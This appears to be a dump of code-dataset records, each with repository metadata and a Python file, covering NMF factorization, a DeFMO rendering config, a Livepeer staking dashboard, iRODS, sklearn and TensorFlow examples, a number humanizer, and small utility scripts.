import RecoVertex.BeamSpotProducer.BeamSpotOnline_cfi
process.offlineBeamSpot = RecoVertex.BeamSpotProducer.BeamSpotOnline_cfi.onlineBeamSpotProducer.clone()
return process
##############################################################################
def customisePromptHI(process):
process= customiseCommonHI(process)
import RecoVertex.BeamSpotProducer.BeamSpotOnline_cfi
process.offlineBeamSpot = RecoVertex.BeamSpotProducer.BeamSpotOnline_cfi.onlineBeamSpotProducer.clone()
return process
##############################################################################
| 36.407407 | 107 | 0.545677 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,856 | 0.37762 |
1fcb25844610f792402d0768084d92368a8057d1
| 4,838 |
py
|
Python
|
renderer/settings.py
|
12564985/DeFMO
|
8ed9c2963678e2c59c7431ec8786302eea841572
|
[
"MIT"
] | 1 |
2022-03-14T12:46:38.000Z
|
2022-03-14T12:46:38.000Z
|
renderer/settings.py
|
12564985/DeFMO
|
8ed9c2963678e2c59c7431ec8786302eea841572
|
[
"MIT"
] | null | null | null |
renderer/settings.py
|
12564985/DeFMO
|
8ed9c2963678e2c59c7431ec8786302eea841572
|
[
"MIT"
] | null | null | null |
## TODO: insert your ShapeNetCore.v2, textures, training and testing background paths
# NOTE that HDF5 is not generated here, to convert the dataset to HDF5 use dataloaders/conversion.py
g_datasets_path = '/mnt/lascar/rozumden/dataset'
g_shapenet_path = g_datasets_path + '/ShapeNetv2/ShapeNetCore.v2'
g_textures_path = g_datasets_path + '/ShapeNetv2/textures'
g_train_backgrounds_path = g_datasets_path + '/vot/'
g_test_backgrounds_path = g_datasets_path + '/sports1m/seq/'
## TODO: insert path to save the generated dataset
g_generated_dataset_path = '/mnt/lascar/rozumden/dataset/ShapeNetv2'
## TODO: insert your blender-2.79b path
g_blender_excutable_path = '/home.stud/rozumden/src/blender-2.79b-linux-glibc219-x86_64/blender'
g_view_point_file = {'view_points/chair.txt', 'view_points/bottle.txt', 'view_points/diningtable.txt', 'view_points/sofa.txt', 'view_points/bed.txt'}
g_render_objs_train = ['table','jar', 'skateboard', 'bottle' , 'tower' ,'chair' ,'bookshelf' ,'camera' ,'laptop' ,'basket' , 'sofa' ,'knife' , 'can' , 'rifle' , 'train' , 'lamp' , 'trash bin' , 'mailbox' , 'watercraft' , 'motorbike' , 'dishwasher' , 'bench' , 'pistol' , 'rocket' , 'loudspeaker' , 'file cabinet' , 'bag' , 'cabinet' , 'bed' , 'birdhouse' , 'display' , 'piano' , 'earphone' , 'telephone' , 'stove' , 'microphone', 'mug', 'remote', 'bathtub' , 'bowl' , 'keyboard', 'guitar' , 'washer', 'faucet' , 'printer' , 'cap' , 'clock', 'helmet', 'flowerpot', 'microwaves']
g_render_objs = g_render_objs_train
if True:
print('Rendering training dataset')
g_number_per_category = 1000
g_texture_path = g_textures_path+'/textures_train/'
g_background_image_path = g_train_backgrounds_path
else:
print('Rendering testing dataset')
g_number_per_category = 20
g_texture_path = g_textures_path+'/textures_test/'
g_background_image_path = g_test_backgrounds_path
g_max_trials = 50 ## max trials per sample to generate a nice FMO (inside image, etc)
#folders to store synthetic data
g_syn_rgb_folder = g_generated_dataset_path+'/ShapeBlur'+str(g_number_per_category)+'STA/' # small textured light average-light
g_temp = g_syn_rgb_folder+g_render_objs[0]+'/'
#camera:
#enum in [‘QUATERNION’, ‘XYZ’, ‘XZY’, ‘YXZ’, ‘YZX’, ‘ZXY’, ‘ZYX’, ‘AXIS_ANGLE’]
g_rotation_mode = 'XYZ'
#output:
g_fmo_steps = 24
#enum in [‘BW’, ‘RGB’, ‘RGBA’], default ‘BW’
g_rgb_color_mode = 'RGBA'
#enum in [‘8’, ‘10’, ‘12’, ‘16’, ‘32’], default ‘8’
g_rgb_color_depth = '16'
g_rgb_color_max = 2**int(g_rgb_color_depth)
g_rgb_file_format = 'PNG'
g_depth_use_overwrite = True
g_depth_use_file_extension = True
g_use_film_transparent = True
#dimension:
#engine type [CYCLES, BLENDER_RENDER]
g_engine_type = 'CYCLES'
#output image size = (g_resolution_x * resolution_percentage%, g_resolution_y * resolution_percentage%)
g_resolution_x = 640
g_resolution_y = 480
g_resolution_percentage = 100/2
g_render_light = False
g_ambient_light = True
g_apply_texture = True
g_skip_low_contrast = True
g_skip_small = True
g_bg_color = (0.6, 0.6, 0.6) # (1.0,1.0,1.0) # (0.5, .1, 0.6)
#performance:
g_gpu_render_enable = False
#if you are using gpu render, recommand to set hilbert spiral to 256 or 512
#default value for cpu render is fine
g_hilbert_spiral = 512
#total 55 categories
g_shapenet_categlory_pair = {
'table' : '04379243',
'jar' : '03593526',
'skateboard' : '04225987',
'car' : '02958343',
'bottle' : '02876657',
'tower' : '04460130',
'chair' : '03001627',
'bookshelf' : '02871439',
'camera' : '02942699',
'airplane' : '02691156',
'laptop' : '03642806',
'basket' : '02801938',
'sofa' : '04256520',
'knife' : '03624134',
'can' : '02946921',
'rifle' : '04090263',
'train' : '04468005',
'pillow' : '03938244',
'lamp' : '03636649',
'trash bin' : '02747177',
'mailbox' : '03710193',
'watercraft' : '04530566',
'motorbike' : '03790512',
'dishwasher' : '03207941',
'bench' : '02828884',
'pistol' : '03948459',
'rocket' : '04099429',
'loudspeaker' : '03691459',
'file cabinet' : '03337140',
'bag' : '02773838',
'cabinet' : '02933112',
'bed' : '02818832',
'birdhouse' : '02843684',
'display' : '03211117',
'piano' : '03928116',
'earphone' : '03261776',
'telephone' : '04401088',
'stove' : '04330267',
'microphone' : '03759954',
'bus' : '02924116',
'mug' : '03797390',
'remote' : '04074963',
'bathtub' : '02808440',
'bowl' : '02880940',
'keyboard' : '03085013',
'guitar' : '03467517',
'washer' : '04554684',
'mobile phone' : '02992529', #
'faucet' : '03325088',
'printer' : '04004475',
'cap' : '02954340',
'clock' : '03046257',
'helmet' : '03513137',
'flowerpot' : '03991062',
'microwaves' : '03761084'
}
# bicycle 02834778
| 35.573529 | 582 | 0.668251 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,931 | 0.596945 |
1fcc73246e5b2e2deb6ef1a5498a653dfdea012b
| 3,094 |
py
|
Python
|
pynm/feature/extract/nmf.py
|
ohtaman/pynm
|
b003962201e4270d0dab681ede37f2d8edd560f2
|
[
"MIT"
] | 1 |
2018-08-16T20:48:52.000Z
|
2018-08-16T20:48:52.000Z
|
pynm/feature/extract/nmf.py
|
ohtaman/pynm
|
b003962201e4270d0dab681ede37f2d8edd560f2
|
[
"MIT"
] | 5 |
2015-01-12T20:40:46.000Z
|
2017-11-17T01:27:41.000Z
|
pynm/feature/extract/nmf.py
|
ohtaman/pynm
|
b003962201e4270d0dab681ede37f2d8edd560f2
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
import numpy
import numpy.random
import numpy.linalg
from . import svd
def svd_init(matrix, dim, seed=None):
u, s, v = svd.svd(matrix, dim)
ss = numpy.sqrt(numpy.diag(s))
return numpy.maximum(0.001, u.dot(ss)), numpy.maximum(0.001, ss.dot(v))
def random_init(matrix, dim, seed=None):
np_random = numpy.random.RandomState(seed)
w = np_random.uniform(size=(matrix.shape[0], dim))
h = np_random.uniform(size=(dim, matrix.shape[1]))
return w, h
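# One multiplicative-update step for the generalized beta-divergence (beta=2 reduces to the Euclidean case).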
def _improve_beta_divergence(orig, current, w, h, epsilon=1e-9, beta=2.0):
if beta < 1:
phi = 1.0/(2.0-beta)
elif beta <= 2.0:
phi = 1.0
else:
phi = 1.0/(beta - 1.0)
wt = w.transpose()
h *= (wt.dot(orig * current**(beta - 2))/(wt.dot(current**(beta - 1)) + epsilon))**phi
ht = h.transpose()
current = w.dot(h)
w *= ((orig * current**(beta - 2)).dot(ht)/((current**(beta - 1)).dot(ht) + epsilon))**phi
return w.dot(h), w, h
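# Lee-Seung multiplicative update for the squared Euclidean distance.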
def _improve_euclidean_distance(orig, current, w, h, epsilon=1e-9):
wt = w.transpose()
h *= wt.dot(orig)/(wt.dot(current) + epsilon)
ht = h.transpose()
current = w.dot(h)
w *= orig.dot(ht)/(current.dot(ht) + epsilon)
return w.dot(h), w, h
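# Multiplicative update for the Kullback-Leibler divergence (factors normalized by their column sums).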
def _improve_kl_diveregence(orig, current, w, h, epsilon=1e-9):
ws = w.sum(axis=0)
wt = (w/(ws + epsilon)).transpose()
h *= wt.dot(orig/(current + epsilon))
ht = h.transpose()
hs = ht.sum(axis=0)
current = w.dot(h)
w *= (orig/(current + epsilon)).dot(ht/(hs + epsilon))
return w.dot(h), w, h
def nmf(matrix,
dim=None,
distance="euclid",
init=svd_init,
max_iter=10000,
threshould=0.001,
epsilon=1e-9,
seed=None):
"""Non-negative Matrix Factorization function
:param numpy.array matrix: Matrix to decompose
:param int dim: dimension of matrix
    :param str distance: distance to minimize. choose "euclid", "kl" or "beta".
        euclid: squared Euclidean distance
        kl: Kullback-Leibler divergence
        beta: generalized beta divergence
        default: "euclid"
    :param int max_iter: max #iterations of the update loop
        default: 10000
    :param float threshould: relative improvement below which the iteration is regarded as converged
:param float epsilon: epsilon to avoid zero division
:param int seed: random seed
:return: factorized matrix w and h
"""
max_rank = min(matrix.shape)
dim = min(dim, max_rank) if dim is not None else max_rank
if distance == "euclid":
_improve = _improve_euclidean_distance
elif distance == "kl":
_improve = _improve_kl_diveregence
elif distance == "beta":
_improve = _improve_beta_divergence
w, h = init(matrix, dim, seed)
wh = w.dot(h)
prev_norm = numpy.linalg.norm(matrix - wh)
for _ in range(max_iter):
wh, w, h = _improve(matrix, wh, w, h, epsilon)
norm = numpy.linalg.norm(matrix - wh)
improvement = (prev_norm - norm)/prev_norm
if improvement < threshould:
break
prev_norm = norm
return w, h
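# Minimal usage sketch (hypothetical call; svd_init relies on the package-relative "from . import svd",
# so import this module as part of its package):
#   w, h = nmf(matrix, dim=5, distance="kl", init=random_init, seed=0)
#   approximation = w.dot(h)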
| 29.75 | 94 | 0.597931 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 690 | 0.223012 |
1fccf8df9831cb035ab2861081b74267181cefc9
| 6,052 |
py
|
Python
|
examples/demo_livepeer.py
|
scout-cool/Bubbletea
|
f0312d6f1c7fde4098d500e811f0503796973d07
|
[
"Apache-2.0"
] | 10 |
2021-08-29T14:58:09.000Z
|
2022-02-07T21:03:07.000Z
|
examples/demo_livepeer.py
|
scout-cool/Bubbletea
|
f0312d6f1c7fde4098d500e811f0503796973d07
|
[
"Apache-2.0"
] | null | null | null |
examples/demo_livepeer.py
|
scout-cool/Bubbletea
|
f0312d6f1c7fde4098d500e811f0503796973d07
|
[
"Apache-2.0"
] | null | null | null |
import datetime
from altair.vegalite.v4.schema.core import Legend
import pandas
from pandas.core.frame import DataFrame
import streamlit as st
import time
import bubbletea
st.header("LIVEPEER Stake Movement")
urlvars = bubbletea.parse_url_var([{'key':'startdate','type':'datetime'}, {'key':'enddate','type':'datetime'}])
try:
end_date = urlvars['enddate']
except KeyError:
end_date = datetime.date.today() - datetime.timedelta(days=0)
try:
start_date = urlvars['startdate']
except KeyError:
start_date = end_date - datetime.timedelta(days=7)
date_range = st.date_input("Date range", (start_date, end_date))
if not len(date_range) == 2:
st.warning("*Please select a date range.*")
st.stop()
start_date = date_range[0]
end_date = date_range[1]
start_timestamp = int(time.mktime(start_date.timetuple()))
end_timestamp = int(time.mktime(end_date.timetuple()))
bubbletea.update_url({'startdate': start_date, 'enddate':end_date})
subgraph_url = "https://api.thegraph.com/subgraphs/name/livepeer/livepeer"
query_date_clause = "{timestamp_gte:%s,timestamp_lt:%s}" % (
start_timestamp,
end_timestamp,
)
query = """
{
bondEvents(where: %s, bypassPagination:true)
{
timestamp,
bondedAmount,
round {id},
newDelegate {id},
oldDelegate {id},
delegator {id},
},
unbondEvents(where: %s, bypassPagination:true)
{
timestamp,
amount,
withdrawRound,
round {id},
delegate {id},
delegator {id},
},
rebondEvents(where: %s, bypassPagination:true)
{
timestamp,
amount,
round {id},
delegate {id},
delegator {id},
}
}
""" % (
query_date_clause,
query_date_clause,
query_date_clause,
)
with st.spinner("Loading data from the graph"):
df = bubbletea.beta_load_subgraph(subgraph_url, query, useBigDecimal=True)
df_bond = df["bondEvents"]
df_bond.rename(columns={"bondedAmount": "amount"}, inplace=True)
df_rebond = df["rebondEvents"]
df_unbond = df["unbondEvents"]
i = 0
df_amount = DataFrame()
for df in [df_bond, df_rebond, df_unbond]:
if len(df) > 0:
        if i == 0:
df_amount = df[["timestamp", "amount", "round.id"]]
else:
df_amount = df_amount.append(df[["timestamp", "amount", "round.id"]])
i += 1
if len(df_amount) == 0:
st.write('No data vailable')
else:
df_amount = df_amount.reset_index()
df_amount_over_time = bubbletea.beta_aggregate_timeseries(
df_amount,
time_column="timestamp",
interval=bubbletea.TimeseriesInterval.DAILY,
columns=[
bubbletea.ColumnConfig(
name="amount",
type=bubbletea.ColumnType.bigdecimal,
aggregate_method=bubbletea.AggregateMethod.SUM,
na_fill_value=0.0,
)
],
)
df_amount_over_time.index.names = ["time"]
st.subheader("Stake moved over time")
st.write(df_amount_over_time)
bubbletea.beta_plot_line(
df_amount_over_time,
x={
"field": "time",
},
y={
"title":"Amount",
"data": [{"title": "Amount", "field": "amount"}],
},
legend="none",
)
df_amount_over_round = bubbletea.beta_aggregate_groupby(
df_amount,
by_column="round.id",
columns=[
bubbletea.ColumnConfig(
name="amount",
type=bubbletea.ColumnType.bigdecimal,
aggregate_method=bubbletea.AggregateMethod.SUM,
na_fill_value=0.0,
)
],
)
df_amount_over_round.index.names = ["round"]
st.write(df_amount_over_round)
bubbletea.beta_plot_line(
df_amount_over_round,
title='Stake moved over rounds',
x={"field": "round", "title": "Round", "type":"ordinal"},# ['quantitative', 'ordinal', 'temporal', 'nominal']
y={
"title":"Amount",
"data": [{"title": "Amount", "field": "amount"}],
},
legend="none"
)
st.subheader("Transcoder Stake Changes")
def process_transcoders():
dfs = []
if len(df_bond) > 0:
df0 = df_bond[["timestamp", "amount", "round.id", "oldDelegate.id"]]
df0.rename(columns={"oldDelegate.id": "transcoder", "amount": "loss"}, inplace=True)
df1 = df_bond[["timestamp", "amount", "round.id", "newDelegate.id"]]
df1.rename(columns={"newDelegate.id": "transcoder", "amount": "gain"}, inplace=True)
dfs.append(df0)
dfs.append(df1)
if len(df_unbond) > 0:
df2 = df_unbond[["timestamp", "amount", "round.id", "delegate.id"]]
df2.rename(columns={"delegate.id": "transcoder", "amount": "loss"}, inplace=True)
dfs.append(df2)
if len(df_rebond) > 0:
df3 = df_rebond[["timestamp", "amount", "round.id", "delegate.id"]]
df3.rename(columns={"delegate.id": "transcoder", "amount": "gain"}, inplace=True)
dfs.append(df3)
df = pandas.DataFrame()
for d in dfs:
if len(df) == 0:
df = d
else:
df = df.append(d)
df.fillna(0.0, inplace=True)
df.reset_index(inplace=True)
return df
df_transcoders = process_transcoders()
df_loss_gains = bubbletea.beta_aggregate_groupby(
df_transcoders,
"transcoder",
columns=[
bubbletea.ColumnConfig(
name="loss",
type=bubbletea.ColumnType.bigdecimal,
aggregate_method=bubbletea.AggregateMethod.SUM,
na_fill_value=0.0,
),
bubbletea.ColumnConfig(
name="gain",
type=bubbletea.ColumnType.bigdecimal,
aggregate_method=bubbletea.AggregateMethod.SUM,
na_fill_value=0.0,
),
],
)
df_loss_gains["total"] = df_loss_gains["loss"] + df_loss_gains["gain"]
st.write(df_loss_gains)
| 28.682464 | 117 | 0.594019 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,634 | 0.269993 |
1fcde10af6e71da8c4ae91b2cecfc62ef747de93
| 956 |
py
|
Python
|
tests/utils/test_match.py
|
jeremyschlatter/vaccine-feed-ingest
|
215f6c144fe5220deaccdb5db3e96f28b7077b3f
|
[
"MIT"
] | null | null | null |
tests/utils/test_match.py
|
jeremyschlatter/vaccine-feed-ingest
|
215f6c144fe5220deaccdb5db3e96f28b7077b3f
|
[
"MIT"
] | 65 |
2021-05-04T13:05:01.000Z
|
2022-03-31T10:13:49.000Z
|
tests/utils/test_match.py
|
jeremyschlatter/vaccine-feed-ingest
|
215f6c144fe5220deaccdb5db3e96f28b7077b3f
|
[
"MIT"
] | null | null | null |
from vaccine_feed_ingest.utils import match
def test_is_concordance_similar(full_location, minimal_location, vial_location):
assert match.is_concordance_similar(full_location, vial_location)
assert not match.is_concordance_similar(minimal_location, vial_location)
def test_is_address_similar(full_location, minimal_location, vial_location):
assert match.is_address_similar(full_location, vial_location)
assert not match.is_address_similar(minimal_location, vial_location)
def test_is_provider_similar(full_location, minimal_location, vial_location):
assert match.is_provider_similar(full_location, vial_location)
assert not match.is_provider_similar(minimal_location, vial_location)
def test_has_matching_phone_number(full_location, minimal_location, vial_location):
assert match.has_matching_phone_number(full_location, vial_location)
assert not match.has_matching_phone_number(minimal_location, vial_location)
| 36.769231 | 83 | 0.848326 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
1fce94867341b2964e24bbb0a90fa03bff2006d5
| 2,201 |
py
|
Python
|
PyRods/examples/user_info.py
|
kaldrill/irodspython
|
9a1018429acf9e86af8fb7ea6f37fb397e0010da
|
[
"CNRI-Python"
] | null | null | null |
PyRods/examples/user_info.py
|
kaldrill/irodspython
|
9a1018429acf9e86af8fb7ea6f37fb397e0010da
|
[
"CNRI-Python"
] | null | null | null |
PyRods/examples/user_info.py
|
kaldrill/irodspython
|
9a1018429acf9e86af8fb7ea6f37fb397e0010da
|
[
"CNRI-Python"
] | null | null | null |
# Copyright (c) 2013, University of Liverpool
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
# Author : Jerome Fuselier
#
from irods import *
if __name__ == "__main__":
status, myEnv = getRodsEnv()
conn, errMsg = rcConnect(myEnv.rodsHost, myEnv.rodsPort,
myEnv.rodsUserName, myEnv.rodsZone)
status = clientLogin(conn)
# Get the information present in the iCAT
print getUserInfo(conn, myEnv.rodsUserName)
#print getUserInfo(conn, myEnv.rodsUserName, myEnv.rodsZone)
# Get an irodsUser object, the zone is optional
user = getUser(conn, myEnv.rodsUserName)
#user = getUser(conn, myEnv.rodsUserName, myEnv.rodsZone)
print "Id:", user.getId()
print "Name:", user.getName()
print "Type:", user.getTypeName()
print "Zone:", user.getZone()
print "Info:", user.getInfo()
print "Comment:", user.getComment()
print "Create TS:", user.getCreateTs()
print "Modify TS:", user.getModifyTs()
# You can modify some of the fields if you are admin
#user.setComment("Useful Comment")
#user.setInfo("Useful info")
# Be careful if you remove your user from rodsadmin you will have trouble to put it back
#user.setTypeName("rodsuser")
# Be careful with this one as changing the zone will change the authentication
#user.setZone("newZone")
# You can get the groups the user belongs to. You obtain irodsGroup instances
print "Member of :"
for g in user.getGroups():
print " -", g.getName()
conn.disconnect()
| 37.305085 | 92 | 0.685597 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,434 | 0.651522 |
1fd17f1089fdee8a486a2a65c3fb934cc9195151
| 1,072 |
py
|
Python
|
sml_iris_knn_dtc.py
|
drishtim17/supervisedML
|
3981d283a9937bfce793237c171fa95764846558
|
[
"Apache-2.0"
] | null | null | null |
sml_iris_knn_dtc.py
|
drishtim17/supervisedML
|
3981d283a9937bfce793237c171fa95764846558
|
[
"Apache-2.0"
] | null | null | null |
sml_iris_knn_dtc.py
|
drishtim17/supervisedML
|
3981d283a9937bfce793237c171fa95764846558
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python3
import sklearn
from sklearn.datasets import load_iris
from sklearn.neighbors import KNeighborsClassifier
from sklearn.model_selection import train_test_split
from sklearn import tree
from sklearn.metrics import accuracy_score
#loading iris
iris=load_iris()
#training features are stored in iris.data
#corresponding target labels are stored in iris.target
#now splitting into test and train data sets
train_iris,test_iris,train_target,test_target=train_test_split(iris.data,iris.target,test_size=0.2)
#calling knn algo
knnclf=KNeighborsClassifier(n_neighbors=3)
#calling dsc algo
dsclf=tree.DecisionTreeClassifier()
#data training
knntrained=knnclf.fit(train_iris,train_target)
dsctrained=dsclf.fit(train_iris,train_target)
#testing algo
#predicted output
knnoutput=knntrained.predict(test_iris)
print(knnoutput)
dscoutput=dsctrained.predict(test_iris)
print(dscoutput)
#original output
print(test_target)
#calculating accuracy
knnpct=accuracy_score(test_target,knnoutput)
print(knnpct)
dscpct=accuracy_score(test_target,dscoutput)
print(dscpct)
| 24.363636 | 99 | 0.841418 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 282 | 0.26306 |
1fd3b3ac45b4ed570227a76c3f4f622771cac325
| 2,762 |
py
|
Python
|
Python/Exercises/Humanize/humanize.py
|
Gjacquenot/training-material
|
16b29962bf5683f97a1072d961dd9f31e7468b8d
|
[
"CC-BY-4.0"
] | 115 |
2015-03-23T13:34:42.000Z
|
2022-03-21T00:27:21.000Z
|
Python/Exercises/Humanize/humanize.py
|
Gjacquenot/training-material
|
16b29962bf5683f97a1072d961dd9f31e7468b8d
|
[
"CC-BY-4.0"
] | 56 |
2015-02-25T15:04:26.000Z
|
2022-01-03T07:42:48.000Z
|
Python/Exercises/Humanize/humanize.py
|
Gjacquenot/training-material
|
16b29962bf5683f97a1072d961dd9f31e7468b8d
|
[
"CC-BY-4.0"
] | 59 |
2015-11-26T11:44:51.000Z
|
2022-03-21T00:27:22.000Z
|
#!/usr/bin/env python
def humanize(n, base=10, digits=1, unit=''):
'''convert a floating point number to a human-readable format
Parameters
----------
n : float or str
number to convert, it can a string representation of
a floating point number
base : int
base to use, either 2 or 10, default is 10
digits : int
decimal digits to use in format string, default is 1
unit : str
unit to use in format string, default is ''
Returns
-------
str
formatted string
Raises
------
ValueError
raised when base is neither 2 nor 10
Examples
--------
>>> humanize(1234)
'1.2 K'
>>> humanize(1234, digits=2)
'1.23 K'
>>> humanize(1234, base=2, digits=2)
'1.21 K'
>>> humanize(1234, unit='B')
'1.2 KB'
>>> humanize('1234.56', digits=4, unit='B')
'1.2346 KB'
>>> humanize(0.0123)
'12.3 m'
'''
import math
if base != 2 and base != 10:
raise ValueError('base should be 2 or 10, not {:d}'.format(base))
thousands = 3 if base == 10 else 10
orders = {
-3: 'n',
-2: 'u',
-1: 'm',
0: '',
1: 'K',
2: 'M',
3: 'G',
4: 'T',
5: 'P',
}
fmt_str = '{{0:.{}f}} {{1:s}}{{2:s}}'.format(digits)
exp = math.log(math.fabs(float(n)), base**thousands)
exp = int(exp - (1 if exp < 0 else 0))
number = float(n)/base**(exp*thousands)
return fmt_str.format(number, orders[exp], unit)
def check_line(line):
try:
_ = float(line)
return True
except:
return False
if __name__ == '__main__':
from argparse import ArgumentParser
import sys
arg_parser = ArgumentParser(description='convert numbers to '
'human-readable format')
arg_parser.add_argument('n', type=float, nargs='?',
help='number to convert')
arg_parser.add_argument('-d', type=int, default=1,
help='number of significant digits')
arg_parser.add_argument('-b', action='store_true',
help='use base 2')
arg_parser.add_argument('-u', default='', help='unit to display')
options = arg_parser.parse_args()
base = 2 if options.b else 10
if options.n:
print('{0:s}'.format(humanize(options.n, base=base, digits=options.d,
unit=options.u)))
else:
for line in sys.stdin:
if check_line(line):
print('{0:s}'.format(humanize(line.strip(), base=base,
digits=options.d,
unit=options.u)))
| 28.474227 | 77 | 0.513034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,164 | 0.421434 |
1fd529b1fbfbcec29e94685aeef6fbda0d26c559
| 1,337 |
py
|
Python
|
data/Latent.py
|
YoungjuNa-KR/Gaze_estimator_implementation
|
95482db40ddef413870f51dadc907910d624ee6e
|
[
"MIT"
] | null | null | null |
data/Latent.py
|
YoungjuNa-KR/Gaze_estimator_implementation
|
95482db40ddef413870f51dadc907910d624ee6e
|
[
"MIT"
] | null | null | null |
data/Latent.py
|
YoungjuNa-KR/Gaze_estimator_implementation
|
95482db40ddef413870f51dadc907910d624ee6e
|
[
"MIT"
] | 1 |
2022-02-03T11:11:21.000Z
|
2022-02-03T11:11:21.000Z
|
import os
import PIL
import torch
from glob import glob
from torch.utils.data import DataLoader
from torchvision.transforms.functional import pil_to_tensor
class Latent(torch.utils.data.Dataset):
def __init__(self, dir_name, transforms=None):
        # Based on the dataset directory, access a different subdirectory
        # depending on whether the train or the test split is requested.
self.root_dir = os.path.join("./dataset", dir_name)
self.imgs = os.listdir(self.root_dir)
        self.transform = transforms
        # Paths of the individual tensors in the dataset.
        self.data = []
        # Label index corresponding to each stored tensor path.
        self.label = []
        # Walk each image directory and record every tensor path with its label.
for i, img in enumerate(self.imgs):
img_path = os.path.join(self.root_dir, img)
for img in glob(os.path.join(img_path)):
self.data.append(img)
self.label.append(i)
    # Return the image tensor and label information stored on the instance.
def __getitem__(self, idx):
img_path, label = self.data[idx], self.label[idx]
        # Use os.path.basename to recover the single image (file) name.
img_name = os.path.basename(img_path)
img = torch.load(img_path)
img = img.type('torch.FloatTensor')
sample = {"image" : img, "label" : label, "name" : img_name}
return sample
def __len__(self):
return len(self.data)
| 29.711111 | 68 | 0.604338 | 1,433 | 0.896185 | 0 | 0 | 0 | 0 | 0 | 0 | 547 | 0.342089 |
1fd5cfc21f6a649e70a7b0760d51e47fca8f6d12
| 1,069 |
py
|
Python
|
day/day_05/solution.py
|
moki/aoc2015
|
da43fccd20d154840161c022d1f3c0f70035d604
|
[
"BSD-3-Clause"
] | null | null | null |
day/day_05/solution.py
|
moki/aoc2015
|
da43fccd20d154840161c022d1f3c0f70035d604
|
[
"BSD-3-Clause"
] | null | null | null |
day/day_05/solution.py
|
moki/aoc2015
|
da43fccd20d154840161c022d1f3c0f70035d604
|
[
"BSD-3-Clause"
] | null | null | null |
def count_vowel(line):
return len([c for c in line if c in "aeiou"])
def is_vowelly(line):
return count_vowel(line) > 2
def is_doublly(line):
return len(
[line[i] for i in range(len(line) - 1) if line[i] == line[i + 1]])
def is_valid(line):
return not sum(c in line for c in ['ab', 'cd', 'pq', 'xy'])
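# Part 1: nice strings have at least three vowels, a doubled letter, and none of the pairs ab, cd, pq, xy.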
def part_1(input):
return len([
line for line in input.split("\n")
if is_vowelly(line) and is_doublly(line) and is_valid(line)
])
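# Part 2: nice strings contain a pair that appears twice without overlapping and a letter that repeats
# with exactly one letter between the occurrences.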
def part_2(input):
lines = input.split("\n")
counter = 0
for line in lines:
cond_1 = False
for i in range(len(line) - 2):
for j in range(i + 2, len(line) - 1):
if line[i] == line[j] and line[i + 1] == line[j + 1]:
cond_1 = True
break
cond_2 = False
for i in range(1, len(line) - 1):
if line[i - 1] == line[i + 1]:
cond_2 = True
break
if cond_1 and cond_2:
counter = counter + 1
return counter
| 21.38 | 74 | 0.507951 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 31 | 0.028999 |
1fd676c1868fb5496119162edb66de118a176730
| 876 |
py
|
Python
|
scripts/mklanguages.py
|
yasen-m/dosage
|
81fe088621ad335cac2a53fcbc7b9b37f49ddce2
|
[
"MIT"
] | null | null | null |
scripts/mklanguages.py
|
yasen-m/dosage
|
81fe088621ad335cac2a53fcbc7b9b37f49ddce2
|
[
"MIT"
] | null | null | null |
scripts/mklanguages.py
|
yasen-m/dosage
|
81fe088621ad335cac2a53fcbc7b9b37f49ddce2
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# update languages.py from pycountry
import os
import codecs
import pycountry
basepath = os.path.dirname(os.path.dirname(__file__))
def main():
"""Update language information in dosagelib/languages.py."""
    fn = os.path.join(basepath, 'dosagelib', 'languages.py')
encoding = 'utf-8'
with codecs.open(fn, 'w', encoding) as f:
f.write('# -*- coding: %s -*-%s' % (encoding, os.linesep))
        f.write('# ISO 639-1 language codes from pycountry%s' % os.linesep)
write_languages(f)
def write_languages(f):
"""Write language information."""
f.write("Iso2Language = {%s" % os.linesep)
for language in pycountry.languages:
if hasattr(language, 'alpha2'):
f.write(" %r: %r,%s" % (language.alpha2, language.name, os.linesep))
f.write("}%s" % os.linesep)
if __name__ == '__main__':
main()
| 29.2 | 83 | 0.634703 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 308 | 0.351598 |
1fd6b807f6071d9b5d2c510c8209a51bbbc35084
| 531 |
py
|
Python
|
reference/for_and_while.py
|
SeanSyue/TensorflowReferences
|
2c93f4c770e2713ef4769f287e022d03e7097188
|
[
"MIT"
] | null | null | null |
reference/for_and_while.py
|
SeanSyue/TensorflowReferences
|
2c93f4c770e2713ef4769f287e022d03e7097188
|
[
"MIT"
] | null | null | null |
reference/for_and_while.py
|
SeanSyue/TensorflowReferences
|
2c93f4c770e2713ef4769f287e022d03e7097188
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
x = tf.Variable(0, name='x')
model = tf.global_variables_initializer()
with tf.Session() as session:
for i in range(5):
session.run(model)
x = x + 1
print(session.run(x))
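# The while-loop variant below: each "x = x + 1" adds a new op to the graph, which run() then re-evaluates.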
x = tf.Variable(0., name='x')
threshold = tf.constant(5.)
model = tf.global_variables_initializer()
with tf.Session() as session:
session.run(model)
while session.run(tf.less(x, threshold)):
x = x + 1
x_value = session.run(x)
print(x_value)
| 19.666667 | 46 | 0.589454 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 | 0.011299 |
1fd6f57e7b90621a24c47afd31d7bbd91668d230
| 59 |
py
|
Python
|
raising_exception_3.py
|
godontop/python-work
|
ea22e0df8b0b17605f5a434e556a388d1f75aa47
|
[
"MIT"
] | null | null | null |
raising_exception_3.py
|
godontop/python-work
|
ea22e0df8b0b17605f5a434e556a388d1f75aa47
|
[
"MIT"
